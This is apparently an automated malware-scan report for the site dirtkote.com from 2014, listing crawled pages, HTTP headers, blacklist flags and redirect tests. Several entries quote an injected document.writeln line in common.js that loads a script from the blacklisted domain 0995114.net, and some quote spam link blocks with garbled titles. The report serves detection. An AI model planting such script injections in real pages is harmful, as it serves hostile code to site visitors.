Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=dirtkote.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://dirtkote.com/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 04:58:29 GMT Accept-Ranges: bytes ETag: "3459d7de46aecf1:2400" Server: Microsoft-IIS/6.0 Content-Length: 13169 Content-Location: http://dirtkote.com/index.html Content-Type: text/html Last-Modified: Sat, 02 Aug 2014 11:42:42 GMT X-Powered-By: ASP.NET | clean |
http://dirtkote.com/index.html | 200 OK Content-Length: 13169 Content-Type: text/html | clean |
http://dirtkote.com/common.js | 200 OK Content-Length: 129 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: www.0995114.net document.writeln("<script type=\"text/javascript\" language=\"javascript\" src=\"http://www.0995114.net/quanju2.js\"></script>"); | ||
http://dirtkote.com/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://dirtkote.com/cpxs/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 04:58:32 GMT Accept-Ranges: bytes ETag: "70a87e1b7a2cf1:2400" Server: Microsoft-IIS/6.0 Content-Length: 12266 Content-Location: http://dirtkote.com/cpxs/index.html Content-Type: text/html Last-Modified: Thu, 17 Jul 2014 21:36:02 GMT X-Powered-By: ASP.NET | clean |
http://dirtkote.com/cpxs/index.html | 200 OK Content-Length: 12266 Content-Type: text/html | clean |
http://dirtkote.com/cpxs/nimamama/zxq13.js | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 04:58:33 GMT Accept-Ranges: bytes ETag: "74984fed93abcf1:2400" Server: Microsoft-IIS/6.0 Content-Length: 65681 Content-Location: http://dirtkote.com/404.html?404;http://dirtkote.com:80/cpxs/nimamama/zxq13.js Content-Type: text/html Last-Modified: Wed, 30 Jul 2014 01:16:44 GMT X-Powered-By: ASP.NET | clean |
http://dirtkote.com/404.html?404;http://dirtkote.com:80/cpxs/nimamama/zxq13.js | 200 OK Content-Length: 65681 Content-Type: text/html | clean |
http://dirtkote.com/003q0 | HTTP/1.1 301 Moved Permanently Date: Thu, 28 Aug 2014 04:58:36 GMT Location: http://dirtkote.com/003q0/ Server: Microsoft-IIS/6.0 Content-Length: 149 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://dirtkote.com/003q0/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 04:58:36 GMT Accept-Ranges: bytes ETag: "2ae880152caacf1:2400" Server: Microsoft-IIS/6.0 Content-Length: 11523 Content-Location: http://dirtkote.com/003q0/index.html Content-Type: text/html Last-Modified: Mon, 28 Jul 2014 06:20:53 GMT X-Powered-By: ASP.NET | clean |
http://dirtkote.com/003q0/index.html | 200 OK Content-Length: 11523 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hysyhg.com ...[2306 bytes skipped]... > <div class='newarticle'>×îÐÂÎÄÕÂ</div> <ul class="c2 ico1"> <li><a href="http://dirtkote.com/003q0/rttplt/4j30.html" title="²»´ºÅ¯»¨¿ªipµØÖ·¶àÉÙÊ«ÏÀ">²»´ºÅ <div class="hot mt1"> <dl class="tbox light"> <dt class='light'><strong>ÓÑÇéÁ´½Ó</strong></dt> <dd class='light'> <ul class="c1 ico2"> <li class="no1"><a href="http://hysyhg.com/qsa8r" title="ÎÒ°®ÎÒ°®É«">ÎÒ°®ÎÒ°®É«</a></li> <li class="no1"><a href="http://evgesoft.com/py9fv" title="http goav-com">http goav-com</a></li> <li class="no1"><a href="http://danrobson.net/85xor" title="Ç¿±©ÃÅ">Ç¿±©ÃÅ</a></li> <li class="no1"><a href="http://km88new.com/8aoc2" title="а¶ñÂþ»Ç§ÊÖ¸ÙÊÖ¶ÔÃùÈ˵ijͷ£">а¶ñÂþ»Ç§ÊÖ¸ÙÊÖ¶ÔÃùÈ˵ijͷ£</a></li> <li class="no1"><a ...[1876 bytes skipped]... | ||
http://dirtkote.com/003q0/common.js | 200 OK Content-Length: 129 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: www.0995114.net document.writeln("<script type=\"text/javascript\" language=\"javascript\" src=\"http://www.0995114.net/quanju2.js\"></script>"); | ||
http://dirtkote.com/003q0/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://dirtkote.com/dfsafan/n1t9.aspx | 500 Server closed connection without sending any data back Content-Length: 105 Content-Type: text/plain | clean |
http://dirtkote.com/test404page.js | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 04:58:39 GMT Accept-Ranges: bytes ETag: "74984fed93abcf1:2400" Server: Microsoft-IIS/6.0 Content-Length: 65681 Content-Location: http://dirtkote.com/404.html?404;http://dirtkote.com:80/test404page.js Content-Type: text/html Last-Modified: Wed, 30 Jul 2014 01:16:44 GMT X-Powered-By: ASP.NET | clean |
http://dirtkote.com/404.html?404;http://dirtkote.com:80/test404page.js | 200 OK Content-Length: 65681 Content-Type: text/html | clean |
http://dirtkote.com/00tjl | HTTP/1.1 301 Moved Permanently Date: Thu, 28 Aug 2014 04:58:41 GMT Location: http://dirtkote.com/00tjl/ Server: Microsoft-IIS/6.0 Content-Length: 149 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://dirtkote.com/00tjl/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 04:58:42 GMT Accept-Ranges: bytes ETag: "ce3bfea224aacf1:2400" Server: Microsoft-IIS/6.0 Content-Length: 9383 Content-Location: http://dirtkote.com/00tjl/index.html Content-Type: text/html Last-Modified: Mon, 28 Jul 2014 05:27:34 GMT X-Powered-By: ASP.NET | clean |
http://dirtkote.com/00tjl/index.html | 200 OK Content-Length: 9383 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: hysyhg.com ...[2921 bytes skipped]... t;/br></li> </div> <div style="clear:both;"> </div> </div> <div style="clear:both;"> </div> </div> <div class="body"> <div class="link">ÓÑÇéÁ´½Ó</div> <div class="linkb"> <a href="http://evgesoft.com/jlj68" title="ÈÕ±¾rentiyishu">ÈÕ±¾rentiyishu</a> <a href="http://hysyhg.com/dsu0t" title="С˵ÌòÉÙÅ®Òõ²¿">С˵ÌòÉÙÅ®Òõ²¿</a> <a href="http://evgesoft.com/iyzis" title="ĸ×ÓÐÔ½»¾Àú">ĸ×ÓÐÔ½»¾Àú</a> <a href="http://danrobson.net/2y0of" title="·¬Ø®">·¬Ø®</a> <a href="http://viewpride.com/gqckn" title="Ë¿ÍàÊÖÒùÊÓƵ">Ë¿ÍàÊÖÒùÊÓƵ</a> <a href="http://shiftsmith.com/zc3xa" title="¶¡ÏãÉ«Çø">¶¡ÏãÉ«Çø</a> <a href="http://beunlbd.com/en43e" title="ƯÁÁ´óÒ̽ã">ƯÁÁ´óÒ̽ã</a> ...[1201 bytes skipped]... | ||
http://dirtkote.com/00tjl/common.js | 200 OK Content-Length: 129 Content-Type: application/x-javascript | suspicious |
Page code contains blacklisted domain: www.0995114.net document.writeln("<script type=\"text/javascript\" language=\"javascript\" src=\"http://www.0995114.net/quanju2.js\"></script>"); | ||
http://dirtkote.com/00tjl/tj.js | 200 OK Content-Length: 122 Content-Type: application/x-javascript | clean |
http://dirtkote.com/00tjl/xgMMfH/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 04:58:44 GMT Accept-Ranges: bytes ETag: "8878daa224aacf1:2400" Server: Microsoft-IIS/6.0 Content-Length: 20926 Content-Location: http://dirtkote.com/00tjl/xgMMfH/index.html Content-Type: text/html Last-Modified: Mon, 28 Jul 2014 05:27:34 GMT X-Powered-By: ASP.NET | clean |
http://dirtkote.com/00tjl/xgmmfh/index.html | 200 OK Content-Length: 20926 Content-Type: text/html | clean |
http://dirtkote.com/00tjl/ddcqqq/ | HTTP/1.1 200 OK Date: Thu, 28 Aug 2014 04:58:46 GMT Accept-Ranges: bytes ETag: "86d98742da2cf1:2400" Server: Microsoft-IIS/6.0 Content-Length: 18808 Content-Location: http://dirtkote.com/00tjl/ddcqqq/index.html Content-Type: text/html Last-Modified: Fri, 18 Jul 2014 02:10:33 GMT X-Powered-By: ASP.NET | clean |
http://dirtkote.com/00tjl/ddcqqq/index.html | 200 OK Content-Length: 18808 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: dirtkote.com
Result:
HTTP/1.1 200 OK
Date: Thu, 28 Aug 2014 04:58:29 GMT
Accept-Ranges: bytes
ETag: "3459d7de46aecf1:2400"
Server: Microsoft-IIS/6.0
Content-Length: 13169
Content-Location: http://dirtkote.com/index.html
Content-Type: text/html
Last-Modified: Sat, 02 Aug 2014 11:42:42 GMT
X-Powered-By: ASP.NET
...13169 bytes of data.
GET / HTTP/1.1
Host: dirtkote.com
Result:
HTTP/1.1 200 OK
Date: Thu, 28 Aug 2014 04:58:29 GMT
Accept-Ranges: bytes
ETag: "3459d7de46aecf1:2400"
Server: Microsoft-IIS/6.0
Content-Length: 13169
Content-Location: http://dirtkote.com/index.html
Content-Type: text/html
Last-Modified: Sat, 02 Aug 2014 11:42:42 GMT
X-Powered-By: ASP.NET
...13169 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dirtkote.com
Referer: http://www.google.com/search?q=dirtkote.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: dirtkote.com
Referer: http://www.google.com/search?q=dirtkote.com
Result:
The result is similar to the first query. There are no suspicious redirects found.